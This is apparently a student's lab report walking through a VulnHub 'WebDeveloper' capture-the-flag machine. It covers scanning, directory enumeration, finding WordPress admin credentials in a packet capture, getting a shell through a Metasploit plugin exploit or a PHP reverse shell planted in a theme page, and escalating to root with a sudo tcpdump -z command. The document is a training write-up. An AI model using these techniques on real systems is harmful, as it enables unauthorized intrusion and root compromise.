Purpose of the experiment: Through the penetration process of target drones, we will understand the CTF competition mode and the knowledge scope covered by CTF, such as MISC, PPC, WEB, etc., through practice, strengthen team collaboration capabilities, and master preliminary CTF practical capabilities and information collection capabilities. Familiar with the use of network scanning, detecting HTTP web services, directory enumeration, privilege escalation, image information extraction, password cracking and other related tools.
System environment: Kali Linux 2, WebDeveloper target source: Vulnerable By Design ~ VulnHub
Experimental tools: no limit
Experimental steps and content:
Purpose: Get the flag in the target machine Web Developer file /root/flag.txt。
Basic idea: IP address survival scan of this network segment (netdiscover); network scan (Nmap); browsing HTTP service; website directory enumeration (Dirb); discovering the data packet file "cap"; analyzing the "cap" file to find the website management background Account and password; plug-in exploitation (with vulnerabilities); exploiting vulnerabilities to obtain server account and password; SSH remote login to the server; tcpdump alternative application.
Implementation details are as follows:
1. Discover the target (netdiscover) and find the IP address of WebDeveloper. screenshot.
2.: Use NMAP to scan the target host, discover the open ports and service status of the target host, take a screenshot and explain what services the target provides? (Using knowledge points from the first experiment)
ssh protocol service: Secure Shell (SSH) is a secure network protocol based on the application layer developed by IETF (The Internet Engineering Task Force). It is a protocol designed to provide security for remote login sessions (you can even use Windows to remotely log in to Linux servers for file transfer) and other network services, and can effectively close loopholes in the network. Through SSH, all transmitted data can be encrypted, and DNS spoofing and IP spoofing can also be prevented. An additional benefit is that the transmitted data is compressed, so the transmission speed can be accelerated. It has now become the standard configuration of Linux systems.
http protocol service: HTTP is the abbreviation of HyperText Transfer Protocol. It is an application layer protocol in the TCP/IP protocol set and is the rule that the client must follow when interacting with the server. It is used to define the process of exchanging data between Web browsers and Web servers as well as the format of the data itself. The bottom layer relies on TCP for reliable information transmission.
3. If the target host provides HTTP service, try to use the browser to access the target website. screenshot. Is there any information available?
Enter the target host IP to enter the website, but no useful information can be found.
4. Use whatweb to detect the CMS template used by the target website. screenshot. What CMS is used for analytics?
After scanning, you can see that cms uses WordPress version 4.9.8
5. Search wpscan online and briefly describe its functions.
WPScanis a WordPress black box scanner for vulnerabilities that can Web scan for vulnerabilities for all developers WordPress and find and fix issues before they develop.
- WPScan is a vulnerability scanning tool that comes with Kali Linux by default. It is written in Ruby and can scan multiple security vulnerabilities in WordPress websites, including WordPress itself, plug-in vulnerabilities, and theme vulnerabilities. The latest version of WPScan contains more than 18,000 plug-in vulnerabilities and 2,600 theme vulnerabilities in its database, and supports the latest version of WordPress. It is worth noting that it is not only able to scan sensitive files like robots.txt, but also detects currently enabled plug-ins and other features
- This scanner can obtain the site user name, obtain all installed plug-ins and themes, as well as vulnerable plug-ins and themes, and provide vulnerability information.
WordpressAt the same time, it can also achieve brute force cracking of usernames and passwords on unprotected sites. WPScanAlready pre-installed on the followingLinuxsystems
6. Use Dirb to blast the website directory. (Dirb is a tool specially used to blast directories. It is installed by default in Kali. Similar tools include foreign patator, dirsearch, DirBuster, and domestic Yujian) Screenshot. Find a directory (path) that appears to be related to network traffic.
5. The browser accesses the directory (path) and finds a cap file. screenshot.
6. Use Wireshark to analyze the data packet and analyze the TCP data flow. Found any useful information? screenshot.
Use the command of the request method to filter the data packets and filter out the data packets requested by post. You can right-click the package description to copy the account password.
The account and password of the server that can be obtained are:
web developer
MasterOfTheUniverse
7. Use the information obtained in the previous step to enter the website backend. screenshot.
(Website administrator account and operating system account are different concepts)
8. Exploit the (Plugin) vulnerability in the CMS.
9. Use the plug-in vulnerability to escalate privileges.
Option 1: Use the MeterSploit plug-in + reflex gallery plug-in vulnerability to implement. Install the reflex gallery plugin. Exploit possible vulnerabilities in the plugin. (Textbook knowledge points)
After establishing the session, check wp-config.php to obtain the account number and password. (Configuration files are very important, configuration files for various systems).
What target are the obtained accounts and passwords used to access? Note the comparison with the description in step 7.
Open msf with msfconsole and search + [plug-in vulnerability reflexfallery] to find the path, and you can see from excellent that the vulnerability is valid
Then execute the following command to design
Change rhosts to the IP of the target machine and exploit to control the target website.
pwd to view the current directory, cd to switch to the /var/www/html directory, ls to view the contents of the current directory, and find the wp-config.php file
You can find the system account password
Option 2: Upload a rebound shell.
php-reverse-shell | pentestmonkey
Download the php file from the above website
[Purpose: PHP website penetration; Implementation method: After uploading the website, the URL accesses (contains) the page of the rebound shell.
Function: This script will initiate a rebound TCP connection to the attacker (the attacker's IP address and port number are specified in the script). 】
This CMS is developed for PHP and can be used to implement rebound shell. But the initialization IP address and port must be modified. (Pointing to the attacker).
Change the ip to the attacker's ip. The port is arbitrary. Here, set port 444 to listen.
Enter the background, find any PHP page, and then use the php-reverse-shell.PHP code to modify the code of the page.
Just copy and paste the code completely:
The attacker uses NC to start monitoring in Kali, and the attacker's browser accesses the modified PHP page. This results in a rebound shell (user www-data). After establishing the session, check wp-config.php to obtain the account number and password. (note the path)
Use the nc command to monitor, note that the port is 444 (the listening port set earlier)
Then visit: 192.168.187.131/wp-content/themes/twentysixteen/404.php, which is to visit the php page we modified before. Return to kali and you will see that it is connected.
Next, use cd /var/www/html to go to this directory, ls to list the files in this directory, you can see the wp-config.php file, and use the cat command to read the file.
You can see the system account password
Option 3: Exploiting file manager plug-in vulnerabilities.
After installing the plug-in, you can browse wp-config.php directly.
Choose one of the above three solutions, or find a solution that can be implemented, and take screenshots of the operation steps.
10. SSH login server
Try to connect to the remote server using the username and password obtained in the previous step to access the database. screenshot.
1. Try to view /root/flag.txt and replace the screenshot below with the screenshot of the result obtained by the following operation.
ssh webdeveloper@targetip
None can be viewed.
10. Use tcpdump to execute arbitrary commands (tcpdump will execute the specified command after capturing the data packet.)
View the commands that can be executed by the current identity.
Found that the tcpdump command can be executed with root privileges
Create attack file
touch /tmp/exploit1
Write shellcode
echo 'cat /root/flag.txt' > /tmp/exploit
Grant executable permissions
chmod +x /tmp/exploit
Use tcpdump to execute arbitrary commands
sudo tcpdump -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/exploit -Z root
Get flag. . . . congratulation!
Detailed explanation of tcpdump command:
-i eth0 captures packets from the specified network card
-w /dev/null Output captured packets to a null device (do not output packet results)
-z [command] Run the specified command
-Z [user] specifies the user to execute the command
-G [rotate_seconds] Execute the dump specified by -w every rotate_seconds seconds.
-W [num] specifies the number of captured packets
Experiment summary
Through this experiment, we can review some of the content we have written before, and learn that there are many ways to achieve the goal, not limited to the above three, so that we can diverge our thinking and learn how to deal with different methods. I also got practice in using some commonly used tools in Kali, and became more familiar with the commands, such as some simple commands in msf, or very simple commands such as cd, pwd, ls, cat, etc. Then I have a certain understanding of configuration files, the dangers of unencrypted files, and the exploitation of vulnerabilities. It is not necessarily the vulnerability itself, but can also be the exploitation of external vulnerabilities such as plug-ins. In short, we benefited a lot from this section.